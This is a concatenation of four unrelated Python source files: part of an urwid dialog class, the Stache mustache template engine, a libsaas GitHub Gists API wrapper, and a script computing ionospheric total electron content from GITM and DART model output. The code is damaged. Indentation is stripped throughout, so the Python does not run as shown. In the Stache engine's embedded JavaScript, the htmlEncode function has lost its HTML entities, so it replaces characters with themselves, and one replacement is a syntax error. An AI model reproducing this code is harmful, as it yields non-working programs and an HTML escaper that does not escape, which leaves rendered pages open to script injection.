if 'window resize' in keys:
parent.screen_size = None
self.showing_modal = False
return self.result
class ButtonDialog (Dialog):
"""
A sub-dialog consisting of a displayed string (passed via 'caption') and a series of buttons (as defined in _uxconf.BUTTON_LIST).
"""
def __init__ (self, parent, width, height, align='center', valign='middle', shadow=u'\u2592', caption="", focus="", **buttons):
"""
        Initialises the ButtonDialog. Extra parameters:
caption: the text caption to be displayed.
        **buttons: a series of keyword arguments with a boolean true value for the button in question to be displayed (or false for it not to be displayed).
"""
self.caption_text = caption
self.buttons = buttons
self.focus = focus
# NB: Width and height increased by two to compensate for LineBox.
Dialog.__init__ (self, parent, width+2, height+2, align, valign, shadow, None)
def OnInit (self):
"""
Dynamically builds the dialog based on the supplied variables.
"""
self.caption = urwid.Text(self.caption_text)
self.button_list = []
focus_column = None
for btype, bval in self.buttons.iteritems():
if not bval:
continue
if not button.has_button(btype):
raise IndexError, btype
btn = button.get_button(btype)
widget = urwid.Button(label=btn.label, on_press=self.GotResult(btn.result))
caption = widget.get_label()
wrapped_widget = urwid.Padding(widget, 'center', len(caption)+4)
self.button_list.append(wrapped_widget)
self.BindText(btn.hotkey, self.GotResult(btn.result))
if caption.lower() == self.focus.lower():
focus_column = self.button_list.index(wrapped_widget)
if focus_column == 0:
focus_column = None
if self.button_list:
self.columns = urwid.Columns(self.button_list, dividechars=1, focus_column=focus_column)
self.pile = urwid.Pile([('fixed', self.height-3, urwid.Filler(self.caption, 'top')), self.columns])
self.layout = urwid.LineBox(urwid.Filler(self.pile))
else:
self.layout = urwid.LineBox(urwid.Filler(self.caption))
self.layout2 = urwid.AttrMap(self.layout, 'dialog')
self.SetTopWidget(self.layout2)
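# Illustrative usage sketch (commented out; `app` stands for an UrwidApp instance
# from this package, and the button keyword names depend on _uxconf.BUTTON_LIST,
# so treat them as hypothetical):
#
#   dlg = ButtonDialog(app, width=40, height=7, caption="Save changes?",
#                      focus="Yes", yes=True, no=True)
#   result = dlg.ShowModal()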
|
from __future__ import generators
import sys
try:
    # py3: html.escape (available since Python 3.2)
from html import escape
except ImportError:
# py2
from cgi import escape
try:
import itertools
itertools_takewhile = itertools.takewhile
except ImportError:
# fake it
def takewhile(predicate, iterable):
# takewhile(lambda x: x<5, [1,4,6,4,1]) --> 1 4
for x in iterable:
if predicate(x):
yield x
else:
break
itertools_takewhile = takewhile
try:
from sys import intern
except ImportError:
pass
py_ver = sys.version[:3]
py_v3 = py_ver >= '3.0'
if py_v3:
string_func = str
else:
string_func = unicode
TOKEN_RAW = intern('raw')
TOKEN_TAGOPEN = intern('tagopen')
TOKEN_TAGINVERT = intern('taginvert')
TOKEN_TAGCLOSE = intern('tagclose')
TOKEN_TAGCOMMENT = intern('tagcomment')
TOKEN_TAGDELIM = intern('tagdelim')
TOKEN_TAG = intern('tag')
TOKEN_PARTIAL = intern('partial')
TOKEN_PUSH = intern('push')
TOKEN_BOOL = intern('bool')
BOOTSRAP_PRE = """
(function(data){
var isArray = Array.isArray || function(obj) {
return toString.call(obj) == '[object Array]';
},
each = function(obj, iterator, context) {
if (obj == null) return;
if (Array.prototype.forEach && obj.forEach === Array.prototype.forEach) {
obj.forEach(iterator, context);
} else if (obj.length === +obj.length) {
for (var i = 0, l = obj.length; i < l; i++) {
if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return;
}
} else {
for (var key in obj) {
if (obj.hasOwnProperty(key)) {
if (iterator.call(context, obj[key], key, obj) === breaker) return;
}
}
}
},
map = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (Array.prototype.map && obj.map === Array.prototype.map) return obj.map(iterator, context);
each(obj, function(value, index, list) {
results[results.length] = iterator.call(context, value, index, list);
});
if (obj.length === +obj.length) results.length = obj.length;
return results;
},
htmlEncode = function(str) {
return String(str)
.replace(/&/g, '&')
.replace(/"/g, '"')
.replace(/'/g, ''')
.replace(/</g, '<')
.replace(/>/g, '>');
},
lookup = function (data, datum) {
var i = 0,
l = data ? data.length : 0;
for (; i < l; i += 1) {
if (datum === '.') {
return data[i]
} else if (data[i] !== void 0 && data[i][datum] !== void 0 && data[i][datum] !== false) {
if (toString.call(data[i][datum]) == '[object Function]') {
return data[i][datum](data)
} else {
return data[i][datum]
}
}
}
return '';
},
section = function(data, tagvalue, callback, invert){
invert = invert || false;
if (isArray(tagvalue)) {
if (!invert && tagvalue.length > 0) {
return map(tagvalue, function(v) { return callback([v].concat(data))}).join('')
} else if (invert && tagvalue.length == 0) {
return callback(data);
}
} else {
if((!invert && tagvalue) || (invert && !tagvalue)) {
if (tagvalue !== void 0 || tagvalue !== true) {
return callback([tagvalue].concat(data));
} else {
return callback(data);
}
}
}
};
"""
BOOTSRAP_POST = """
})
"""
def _checkprefix(tag, prefix):
if tag and tag[0] == prefix:
return tag[1:].strip()
else:
return None
def _lookup(data, datum):
for scope in data:
if datum == '.':
return string_func(scope)
elif datum in scope:
return scope[datum]
elif hasattr(scope, datum):
return getattr(scope, datum)
return None
def _renderjsfunction(parts, prefix = "", postfix = "", params="data, tag"):
return "function({params}) {{{prefix} return {content} {postfix} }}".format(
content=_renderjsjoin(*parts),
prefix=prefix,
postfix=postfix,
params=params)
def _renderjsjoin(*args):
return "[{0}].join('');".format(','.join(args))
def render(template, data):
return Stache().render(template, data)
def render_js(template):
return Stache().render_js(template)
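# A minimal sketch of the module-level helpers above:
#
#   render('Hello {{name}}', {'name': 'World'})
#   # -> 'Hello World'
#   render('{{#items}}<li>{{.}}</li>{{/items}}', {'items': ['a', 'b']})
#   # -> '<li>a</li><li>b</li>'
#
# The remaining tag prefixes (#, ^, /, !, >, <, ?, :, {, &, =) are handled by
# Stache._tokenize below.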
class Stache(object):
def __init__(self):
self.otag = '{{'
self.ctag = '}}'
self.templates = {}
self.hoist = {}
self.hoist_data = {}
self.section_counter = 0
def copy(self):
copy = Stache()
copy.templates = self.templates
return copy
def add_template(self, name, template):
self.templates[name] = list(self._tokenize(template))
def render(self, template, data={}):
self.otag = '{{'
self.ctag = '}}'
return ''.join(self._parse(self._tokenize(template), data))
def render_iter(self, template, data={}):
copy = self.copy()
return copy._parse(copy._tokenize(template), data)
def render_template(self, template_name, data={}):
self.otag = '{{'
self.ctag = '}}'
return ''.join(self._parse(iter(list(self.templates[template_name])), data))
def render_template_iter(self, template_name, data={}):
copy = self.copy()
return copy._parse(iter(list(copy.templates[template_name])), data)
def _js_hoisted(self, bare=True):
hoist = ''
if self.templates:
hoist += "\n var templates = {};\n"
for name in self.templates:
render_function = list(self._jsparse(iter(list(self.templates[name]))))
newparams = "data"
prefix = ""
if not bare and self.hoist_data:
                    hoisted = ['"{0}": {1}'.format(x, self.hoist_data[x]) for x in self.hoist_data]
prefix = ' var data = [dat2, {{{0}}}];'.format(', '.join(hoisted))
self.hoist_data = {}
newparams = 'dat2';
hoist += ' templates["{0}"] = {1};\n'.format(name, _renderjsfunction(render_function, prefix=prefix, params=newparams))
if self.hoist:
for name in self.hoist:
hoist += ' var {0} = {1};\n'.format(name, self.hoist[name])
if bare:
if self.hoist_data:
for name in self.hoist_data:
hoist += ' {2}["{0}"] = {1};\n'.format(name, self.hoist_data[name], "data")
return hoist
def render_js(self, template):
copy = self.copy()
renderedjs = _renderjsjoin(*list(copy._jsparse(copy._tokenize(template))))
hoist = copy._js_hoisted()
jstemplate = "{0}\n {1}\n data = [data];\n return {2};\n{3}"
return jstemplate.format(BOOTSRAP_PRE, hoist, renderedjs, BOOTSRAP_POST)
def render_js_template(self, template_name):
copy = self.copy()
hoist = copy._js_hoisted(bare=False)
jstemplate = "{0}\n {1}\n return templates['{2}']([data]);\n{3}"
return jstemplate.format(BOOTSRAP_PRE, hoist, template_name, BOOTSRAP_POST)
def render_all_js(self):
copy = self.copy()
hoist = copy._js_hoisted(bare=False)
jstemplate = "{0}\n var baseData={{}};\n {1}\n return templates;\n{2}"
return jstemplate.format(BOOTSRAP_PRE, hoist, BOOTSRAP_POST)
def _tokenize(self, template):
rest = template
scope = []
while rest and len(rest) > 0:
pre_section = rest.split(self.otag, 1)
if len(pre_section) == 2:
pre, rest = pre_section
else:
pre, rest = (pre_section[0], None)
if rest:
taglabel, rest = rest.split(self.ctag, 1)
else:
taglabel, rest = (None, None)
if taglabel:
taglabel = taglabel.strip()
else:
taglabel = ''
open_tag = _checkprefix(taglabel, '#')
if not open_tag:
invert_tag = _checkprefix(taglabel, '^')
else:
invert_tag = None
if not invert_tag:
close_tag = _checkprefix(taglabel, '/')
else:
close_tag = None
comment_tag = None
partial_tag = None
push_tag = None
bool_tag = None
booltern_tag = None
unescape_tag = None
if not close_tag:
comment_tag = _checkprefix(taglabel, '!')
if not comment_tag:
partial_tag = _checkprefix(taglabel, '>')
if not partial_tag:
push_tag = _checkprefix(taglabel, '<')
if not push_tag:
bool_tag = _checkprefix(taglabel, '?')
if not bool_tag:
booltern_tag = _checkprefix(taglabel, ':')
if not booltern_tag:
unescape_tag = _checkprefix(taglabel, '{')
if unescape_tag:
rest = rest[1:]
else:
rest = rest # FIXME seems like a NOOP
if not booltern_tag:
unescape_tag = (unescape_tag or _checkprefix(taglabel, '&'))
else:
unescape_tag = None
if not unescape_tag and len(taglabel) >= 2 and taglabel[0] == '=' and taglabel[-1] == '=':
delim_tag = taglabel[1:-1]
else:
delim_tag = None
if delim_tag:
delim_tag = delim_tag.split(' ', 1)
else:
delim_tag = None
if delim_tag and len(delim_tag) == 2:
delim_tag = delim_tag
else:
delim_tag = None
# fix for https://github.com/hyperturtle/Stache/issues/2 from https://github.com/SmithSamuelM/staching/commit/f2c591ec69cc922c6ffec67e0d66f8047f2f2bf3
if ( open_tag or invert_tag or comment_tag or
partial_tag or push_tag or bool_tag or
booltern_tag or unescape_tag or delim_tag): # not a variable
inline = False
if rest: # strip trailing whitespace and linefeed if present
front, sep, back = rest.partition("\n") # partition at linefeed
if sep:
if not front.strip(): # only whitespace before linefeed
rest = back # removed whitespace and linefeed
#if _debug: print( "open rest strip front: \n%s" % rest)
else: #inline
inline = True
#if _debug: print( "open inline:")
if not inline and pre: #strip trailing whitespace after linefeed if present
front, sep, back = pre.rpartition("\n")
if sep:
if not back.strip(): # only whitespace after linefeed
pre = ''.join((front, sep)) # restore linefeed
#if _debug: print( "open pre strip back: \n%s" % pre)
else:
pre = back.rstrip() #no linefeed so rstrip
#if _debug: print( "open pre rstrip back: \n%s" % pre)
elif close_tag:
inline = True # section is inline
follow = False # followed by inline
post = ''
if rest: # see if inline follows
front, sep, back = rest.partition("\n")
if front.strip(): # not empty before linefeed so inline follows
follow = True # inline follows
#if _debug: print( "close follow:")
if pre: #strip trailing whitespace after prev linefeed if present
front, sep, back = pre.rpartition("\n")
if sep and not back.strip(): # only whitespace after linefeed
inline = False
#if _debug: print() "close not inline:" )
if follow:
post = back # save spacing for following inline
pre = ''.join((front, sep)) # restore upto linefeed
#if _debug: print( "close pre strip back: \n%s" % pre)
if not inline and rest: # strip trailing whitespace and linefeed if present
if follow: # restore saved spacing
rest = post + rest
#print( "close follow rest: \n%s" % rest)
front, sep, back = rest.partition("\n") # partition at linefeed
if sep:
if not front.strip(): # only whitespace before linefeed
rest = back # remove trailing whitespace and linefeed
#if _debug: print( "close rest strip front: \n%s" % rest)
if push_tag:
pre = pre.rstrip()
rest = rest.lstrip()
if pre:
yield TOKEN_RAW, pre, len(scope)
if open_tag:
scope.append(open_tag)
yield TOKEN_TAGOPEN, open_tag, len(scope)
elif bool_tag:
scope.append(bool_tag)
yield TOKEN_BOOL, bool_tag, len(scope)
elif invert_tag:
scope.append(invert_tag)
yield TOKEN_TAGINVERT, invert_tag, len(scope)
elif close_tag is not None:
current_scope = scope.pop()
if close_tag:
assert (current_scope == close_tag), 'Mismatch open/close blocks'
yield TOKEN_TAGCLOSE, current_scope, len(scope)+1
elif booltern_tag:
scope.append(booltern_tag)
yield TOKEN_TAG, booltern_tag, 0
yield TOKEN_TAGINVERT, booltern_tag, len(scope)
elif comment_tag:
yield TOKEN_TAGCOMMENT, comment_tag, 0
elif partial_tag:
yield TOKEN_PARTIAL, partial_tag, 0
elif push_tag:
scope.append(push_tag)
yield TOKEN_PUSH, push_tag, len(scope)
elif delim_tag:
yield TOKEN_TAGDELIM, delim_tag, 0
elif unescape_tag:
yield TOKEN_TAG, unescape_tag, True
else:
yield TOKEN_TAG, taglabel, False
def _parse(self, tokens, *data):
for token in tokens:
#print ' token:' + string_func(token)
tag, content, scope = token
if tag == TOKEN_RAW:
yield string_func(content)
elif tag == TOKEN_TAG:
tagvalue = _lookup(data, content)
                #can't use `if tagvalue` because we need to render tagvalue if it's 0
                #testing `tagvalue == 0` doesn't work either, since False == 0
if tagvalue is not None and tagvalue is not False:
try:
if len(tagvalue) > 0:
if scope:
yield string_func(tagvalue)
else:
yield escape(string_func(tagvalue))
except TypeError:
if scope:
yield string_func(tagvalue)
else:
yield escape(string_func(tagvalue))
elif tag == TOKEN_TAGOPEN or tag == TOKEN_TAGINVERT:
tagvalue = _lookup(data, content)
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
if (tag == TOKEN_TAGOPEN and tagvalue) or (tag == TOKEN_TAGINVERT and not tagvalue):
if hasattr(tagvalue, 'items'):
#print ' its a dict!', tagvalue, untilclose
for part in self._parse(untilclose, tagvalue, *data):
yield part
else:
try:
iterlist = list(iter(tagvalue))
if len(iterlist) == 0:
raise TypeError
#print ' its a list!', list(rest)
#from http://docs.python.org/library/itertools.html#itertools.tee
#In general, if one iterator uses most or all of the data before
#another iterator starts, it is faster to use list() instead of tee().
rest = list(untilclose)
for listitem in iterlist:
for part in self._parse(iter(rest), listitem, *data):
yield part
except TypeError:
#print ' its a bool!'
for part in self._parse(untilclose, *data):
yield part
else:
for ignore in untilclose:
pass
elif tag == TOKEN_BOOL:
tagvalue = _lookup(data, content)
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
if tagvalue:
for part in self._parse(untilclose, *data):
yield part
else:
for part in untilclose:
pass
elif tag == TOKEN_PARTIAL:
if content in self.templates:
for part in self._parse(iter(list(self.templates[content])), *data):
yield part
elif tag == TOKEN_PUSH:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
data[-1][content] = ''.join(self._parse(untilclose, *data))
elif tag == TOKEN_TAGDELIM:
self.otag, self.ctag = content
def _jsparse(self, tokens):
self.otag = '{{'
self.ctag = '}}'
for token in tokens:
tag, content, scope = token
if tag == TOKEN_RAW:
yield "'{0}'".format(string_func(content))
elif tag == TOKEN_TAG:
if content != '':
if scope:
yield "lookup(data, '{0}')".format(content)
else:
yield "htmlEncode(lookup(data, '{0}'))".format(content)
elif tag == TOKEN_TAGOPEN or tag == TOKEN_TAGINVERT or tag == TOKEN_BOOL:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
inside = self._jsparse(untilclose)
if tag == TOKEN_TAGOPEN:
pre = "return section(data, lookup(data, tag), function (data) {"
post = "});"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_TAGINVERT:
pre = "return section(data, lookup(data, tag), function (data) {"
post = "}, true);"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_BOOL:
pre = "var tagvalue = lookup(data, tag); if ((!isArray(tagvalue) && tagvalue) || (isArray(tagvalue)) && tagvalue.length > 0){"
post = "}"
self.hoist["__section{0}".format(len(self.hoist))] = _renderjsfunction(inside, pre, post)
yield "__section{1}(data, '{0}')".format(content, len(self.hoist)-1)
elif tag == TOKEN_PARTIAL:
yield "templates['{0}'](data)".format(content)
elif tag == TOKEN_PUSH:
untilclose = itertools_takewhile(lambda x: x != (TOKEN_TAGCLOSE, content, scope), tokens)
self.hoist_data[content] = _renderjsfunction(self._jsparse(untilclose), params="data")
elif tag == TOKEN_TAGDELIM:
self.otag, self.ctag = content
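# A minimal, self-contained sketch of registering and rendering a named template
# (runs only when this file is executed directly):
if __name__ == '__main__':
    demo = Stache()
    demo.add_template('greet', 'Hello {{name}}!')
    print(demo.render_template('greet', {'name': 'world'}))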
|
from libsaas import http, parsers
from libsaas.services import base
from . import resource
class GistCommentsBase(resource.GitHubResource):
path = 'comments'
def wrap_object(self, obj):
return {'body': obj}
class GistComments(GistCommentsBase):
@base.apimethod
def get(self, format=None, page=None, per_page=None):
url = self.get_url()
params = base.get_params(('page', 'per_page'), locals())
headers = resource.mimetype_accept(format)
return http.Request('GET', url, params, headers), parsers.parse_json
class GistComment(GistCommentsBase):
@base.apimethod
def get(self, format=None, page=None, per_page=None):
url = self.get_url()
params = base.get_params(('page', 'per_page'), locals())
headers = resource.mimetype_accept(format)
return http.Request('GET', url, params, headers), parsers.parse_json
class Gists(resource.GitHubResource):
path = 'gists'
@base.apimethod
def public(self, page=None, per_page=None):
"""
Fetch public gists. The parameters are the same as for `get`.
"""
url = '{0}/public'.format(self.get_url())
params = base.get_params(('page', 'per_page'), locals())
return http.Request('GET', url, params), parsers.parse_json
@base.apimethod
def starred(self, page=None, per_page=None):
"""
Fetch gists starred by the authenticated user. The parameters are the
same as for `get`.
"""
url = '{0}/starred'.format(self.get_url())
params = base.get_params(('page', 'per_page'), locals())
return http.Request('GET', url, params), parsers.parse_json
@base.resource(GistComment)
def comment(self, comment_id):
"""
Return the resource corresponding to a single comment on a gist.
When updating comments, use a simple string as the parameter to
`update`, you don't have to use `{"body": <comment body>}`.
"""
return GistComment(self, comment_id)
class Gist(resource.GitHubResource):
path = 'gists'
@base.apimethod
def star(self):
"""
Star this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
# include a body, because requests does not send content-length when no
# body is present, and that makes GitHub respond with HTTP 411
return http.Request('PUT', url, params='*'), parsers.parse_empty
@base.apimethod
def unstar(self):
"""
Unstar this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
return http.Request('DELETE', url), parsers.parse_empty
@base.apimethod
def is_starred(self):
"""
Check if this gist is starred.
:return: bool
"""
url = '{0}/{1}'.format(self.get_url(), 'star')
return http.Request('GET', url), resource.parse_boolean
@base.apimethod
def fork(self):
"""
Fork this gist.
"""
url = '{0}/{1}'.format(self.get_url(), 'fork')
return http.Request('POST', url), parsers.parse_json
def comments(self):
"""
Return the resource corresponding to all comments on this gist.
When creating comments, use a simple string as the parameter to
`create`, you don't have to use `{"body": <comment body>}`.
"""
return GistComments(self)
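# Illustrative usage sketch (hypothetical: the service entry point that wires up
# these resources lives elsewhere in libsaas, so `gh` is assumed here):
#
#   gh = ...                      # a libsaas GitHub service instance
#   gh.gist('1').star()           # PUT  /gists/1/star
#   gh.gists().public(page=1)     # GET  /gists/public?page=1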
|
#imports (standard ones first, then the ones I wrote)
import numpy as np #for data structures
from scipy.io import netcdf #to read DART data
from scipy.interpolate import griddata #for interpolation
from scipy import interpolate
import subprocess #for moving files
import sys
import cPickle as pickle
import datetime, time #for keeping track of GITM files
import math #for pi
import matplotlib
matplotlib.use('Agg') #so as not to need a display or X-server
import matplotlib.pyplot as plt #for plotting
from matplotlib.patches import Polygon
from mpl_toolkits.mplot3d import Axes3D #for 3d plotting
import read_gitm_bin #module I wrote for reading gitm binary files
import read_gps_txt #module I wrote for reading gps text files
import plot_tec_lib #module I wrote for plotting tec
def tecify(time, Lon, Lat, Alt, Eds):
"""
compute VTEC from electron density (Eds)
INPUTS:
- time[ti] - np.array of "datetime" times
- Lon[n] - np.array of lons
- Lat[t] - np.array of lats
- Alt[a] - np.array of alts
- Eds[n,t,a,ti] - np.array over [lon,lat,alt,time]
OUTPUTS:
- Vtec_r[n,t,ti] - np.array over [lon,lat,time]
"""
dh = np.diff(Alt) #Alt(i+1)-Alt(i)
H = np.diag(np.ones(len(Alt), float)) + np.diag(np.ones(len(Alt)-1, float),k=1)
H = H[0:-1,:] #np.dot(H,I) will result in sum of neighbors = [I(2)+I(1), I(3)+I(2), ..., I(50)+I(49)]
Vtec_r=np.zeros( (len(Lon), len(Lat), len(time)), float )
for ti in range(len(time)): #I just ran it for 1 day
Vtec = np.zeros( (len(Lon),len(Lat)), float )
for n in range(len(Lon)):
for t in range(len(Lat)):
Vtec_r[n,t,ti] = np.dot(dh, np.dot(H,Eds[n,t,:,ti]))/2.0 * 10.0**-16 #tec=(A2-A1)*(f2+f1)/2 - trapezoidal rule, 10^-16 is the TECU
return Vtec_r
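#quick sanity check of the trapezoidal integration above (illustrative only):
#with Alt = [0, 1e5, 2e5] m and a constant Eds of 1e12 e/m^3 at one (lon,lat,time),
#dh = [1e5, 1e5] and np.dot(H, Eds) = [2e12, 2e12], so
#VTEC = (1e5*2e12 + 1e5*2e12)/2 * 1e-16 = 2e17 * 1e-16 = 20 TECU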
#contains - I use this keyword to separate function definitions from the actual calls. This is the opposite of Fortran's convention, but oh well
fn_gitm = sys.argv[1] #where the truth files are
fn_gps = sys.argv[2] #where the gps observation text file is
sim = sys.argv[3] in ['true', 'True', '.true.', 'T', 't', '1', True] #was this gps file simulated (True) or real (False)? eg sim = 'True' for simulated. Affects what gets compared to what below (search sim) and what gets plotted
#read GITM binary files
timeT1 = datetime.datetime(2002, 12, 1, 0, 5, 0) #when did you start your truth simulation? note that GITM produces its first file AFTER one full step (ie if you started at 0 minutes and asked it to write every 5 minutes, the first file will show up at 5 min)
timeT = np.array([ timeT1 + datetime.timedelta(minutes=m) for m in range(0, 30, 5)]) #assumes you ran gitm for 30 minutes with step of 5 minutes
print 'Reading GITM binary files... '
#to save time in subsequent reads, I only read truth data once and pickle it (into fn+'.p') and use the pickled file every time afterwards
try:
f = open( fn_gitm+'.p', 'rb' )
print 'pickled file found, reading it'
(LonT, LatT, AltT, EdsT) = pickle.load(f)
f.close()
except:
print 'pickled file not found, making one'
(LonT, LatT, AltT, EdsT) = read_gitm_bin.read(timeT, fn_gitm)
f = open( fn_gitm+'.p', 'wb' )
pickle.dump((LonT, LatT, AltT, EdsT) , f)
f.close()
print 'Done w/ GITM binary files.'
LonT=LonT*180/math.pi #convert to degrees
LatT=LatT*180/math.pi #convert to degrees
VtecT = tecify(timeT, LonT, LatT, AltT, EdsT)
#read DART netcdf files
print 'Reading DART netcdf files... '
f = netcdf.netcdf_file('../work/preassim.nc', 'r')
#f.dimensions
#for d in dir(f): print d
#for d in f.variables: print d
timeE1 = f.variables['time'].data #timeE.units 'days since 1601-01-01 00:00:00'
#convert dart time to unix epoch time (seconds since 1970 1 1)
# to do that, add the original dart base of 1601 and subtract the unix base of 1970
tdiff = (datetime.datetime(1970,1,1)-datetime.datetime(1601,1,1)).total_seconds()
timeE = timeE1*86400 - tdiff
timeE = np.array([ datetime.datetime.utcfromtimestamp(t) for t in timeE ]) #convert unix epoch to datetime
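#sanity check: the 1601 -> 1970 offset computed above is 134774 days = 11644473600 s,
#the same constant used when converting Windows FILETIME timestamps to unix time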
#tt = (timeT - datetime.datetime(1970,1,1)).total_seconds() #convert timeT to unix epoch time
LonE = f.variables['LON'].data
LatE = f.variables['LAT'].data
AltE = f.variables['ALT'].data
f.variables['ie_IDensityS'].dimensions
type(f.variables['ie_IDensityS'].dimensions)
#f.variables['ie_IDensityS'].T.dimensions
EdsEr = f.variables['ie_IDensityS'].data[:,0,:,:,:].T #np.array over [time,copy,alt,lat,lon], where copy=0 means ensemble mean, 1 ens. var, possibly ens. members themselves (if you change num_output_state_members in input.nml to nonzero values) and then -2 is inflation_value at every step (see section 9 in DART tutorial and inf_initial in input.nml) and -1 is inflation_standard_deviation (see inf_sd_initial in input.nml)
#Transpose is needed because dart writes it in [time,alt,lat,lon], whereas I want [lon,lat,alt,time], so only a reversal (=transpose) is needed
EdssdEr = f.variables['ie_IDensityS'].data[:,1,:,:,:].T #standard deviation
f107Er = f.variables['f107'].data[:,0,0] #[time,copy,wavelength] - mean, just 1 wavelength for now
f107sdEr = f.variables['f107'].data[:,1,0] #standard deviation
f.close()
f = netcdf.netcdf_file('../work/analysis.nc', 'r')
EdsEo = f.variables['ie_IDensityS'].data[:,0,:,:,:].T #mean
EdssdEo = f.variables['ie_IDensityS'].data[:,1,:,:,:].T #standard deviation
f107Eo = f.variables['f107'].data[:,0,0] #mean
f107sdEo = f.variables['f107'].data[:,1,0] #sd
f.close()
f = netcdf.netcdf_file('../work/obs_diag_output.nc', 'r')
#for d in dir(f): print d
#for d in f.variables: print d
#for d in range(21): print d, ''.join(f.variables['CopyMetaData'][d])
obs_time = f.variables['time'].data
obs_time = obs_time*86400 - (datetime.datetime(1970,1,1)-datetime.datetime(1601,1,1)).total_seconds()
obs_time = np.array([ datetime.datetime.utcfromtimestamp(t) for t in obs_time ]) #convert unix epoch time to datetime
obs_vposs_r = f.variables['GND_GPS_VTEC_guess'][:,0,3,0]
obs_vused_r = f.variables['GND_GPS_VTEC_guess'][:,1,3,0]
obs_vrmse_r = f.variables['GND_GPS_VTEC_guess'][:,6,3,0]
obs_vbias_r = f.variables['GND_GPS_VTEC_guess'][:,7,3,0]
obs_vspread_r = f.variables['GND_GPS_VTEC_guess'][:,8,3,0]
obs_vtotspread_r = f.variables['GND_GPS_VTEC_guess'][:,9,3,0]
obs_vbadqc_r = f.variables['GND_GPS_VTEC_guess'][:,10,3,0]
obs_vtruth_r = f.variables['GND_GPS_VTEC_guess'][:,11,3,0]
obs_vensm_r = f.variables['GND_GPS_VTEC_guess'][:,12,3,0]
obs_vposs_o = f.variables['GND_GPS_VTEC_analy'][:,0,3,0]
obs_vused_o = f.variables['GND_GPS_VTEC_analy'][:,1,3,0]
obs_vrmse_o = f.variables['GND_GPS_VTEC_analy'][:,6,3,0]
obs_vbias_o = f.variables['GND_GPS_VTEC_analy'][:,7,3,0]
obs_vspread_o = f.variables['GND_GPS_VTEC_analy'][:,8,3,0]
obs_vtotspread_o = f.variables['GND_GPS_VTEC_analy'][:,9,3,0]
obs_vbadqc_o = f.variables['GND_GPS_VTEC_analy'][:,10,3,0]
obs_vtruth_o = f.variables['GND_GPS_VTEC_analy'][:,11,3,0]
obs_vensm_o = f.variables['GND_GPS_VTEC_analy'][:,12,3,0]
f.close()
print 'Done w/ DART netcdf files.'
VtecE = tecify(timeE, LonE, LatE, AltE, EdsEo)
#load gps vtec data
timeD, LonD, LatD, VtecD, VtecsdD = read_gps_txt.read(fn_gps)
if sim:
timeD1= timeD #if sim data, no need to shift time
else:
timeD1 = timeD + datetime.timedelta(seconds=150) #timeD is shifted by 2.5 minutes so it matches timeT (only for plotting purposes)
tcommon = sorted(set(timeT) & set(timeE) & set(timeD1)) #plot only at common times
#sequence of 2dplots of only data
#execfile('plot_data_2d.py')
#sequence of 3dplots of data with eakf estimates and with truth
#execfile('plot_gps_3d.py')
#fit a surface to gps data at every timestep
VtecDi = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
for ti in range(len(tcommon)):
x = LonD[timeD1==tcommon[ti]]
y = LatD[timeD1==tcommon[ti]]
z = VtecD[timeD1==tcommon[ti]]
VtecDi[:,:,ti] = griddata((x, y), z, np.meshgrid(LonE, LatE), method='linear', fill_value=0).T #BEWARE of fill_value=0!!!!!, Transpose is needed because meshgrid creates Lon that varies inside a row instead of column!
#more legit interpolation way (including time), but doesn't work yet
#VtecDi = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
#loni, lati = np.meshgrid(LonE, LatE)
#for ti in range(len(timeE)):
# lon = LonD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# lat = LatD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# time = time.mktime(timeD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)].timetuple())
# vtec = VtecD[abs(timeD-timeE[ti]) < datetime.timedelta(minutes=30)]
# timei = np.empty_like(loni, object)
# timei[:] = timeE[ti]
# griddata((lon, lat, time), vtec, (loni, lati, timei), method='linear') # fill_value=0
# VtecDi[:,:,ti] = griddata((lon, lat, time), vtec, (loni, lati, timei), method='linear') # fill_value=0
#sequence of 3dplots
#execfile('plot_gps_3d_interp.py')
#ensemble - data
VtecED = np.zeros( (len(LonE), len(LatE), len(tcommon) ), float)
for ti in range(len(tcommon)):
if sim: #simulated data, want to compare est with truth
VtecED[:,:,ti] = abs(VtecE[:,:,np.where(timeE==list(tcommon)[ti])[0][0]] - VtecT[:,:,np.where(timeT==list(tcommon)[ti])[0][0]])
else: #real data, want to compare est with real
VtecED[:,:,ti] = abs(VtecE[:,:,np.where(timeE==list(tcommon)[ti])[0][0]] - VtecDi[:,:,ti])
#interpolate the diff so it looks nicer on plots
res = 1.0 #lat,lon resolution to which interpolate the data
loni = np.arange(min(LonE)+res,max(LonE),res) #what lons do you want to interpolate it to
lati = np.arange(min(LatE)+res,max(LatE),res) #what lons do you want to interpolate it to
VtecEDi = np.zeros( (len(loni), len(lati), len(tcommon) ), float)
for ti in range(len(tcommon)):
f = interpolate.RectBivariateSpline(LonE,LatE,VtecED[:,:,ti])
for t in range(len(lati)):
for n in range(len(loni)):
VtecEDi[n,t,ti] = f( loni[n], lati[t] )
#memory was an issue, so here is how to check:
# for i in dir():
# try:
# print (i, eval(i).nbytes )
# except:
# print (i, sys.getsizeof(eval(i)) )
#sequence of 3dplots
#execfile('plot_diff_2d.py')
#execfile('plot_diff_2d_f107.py')
lona=13 #index of Lon closest to Ann Arbor
lata=13 #index of Lat closest to Ann Arbor
alta=34 #index of Alt I chose
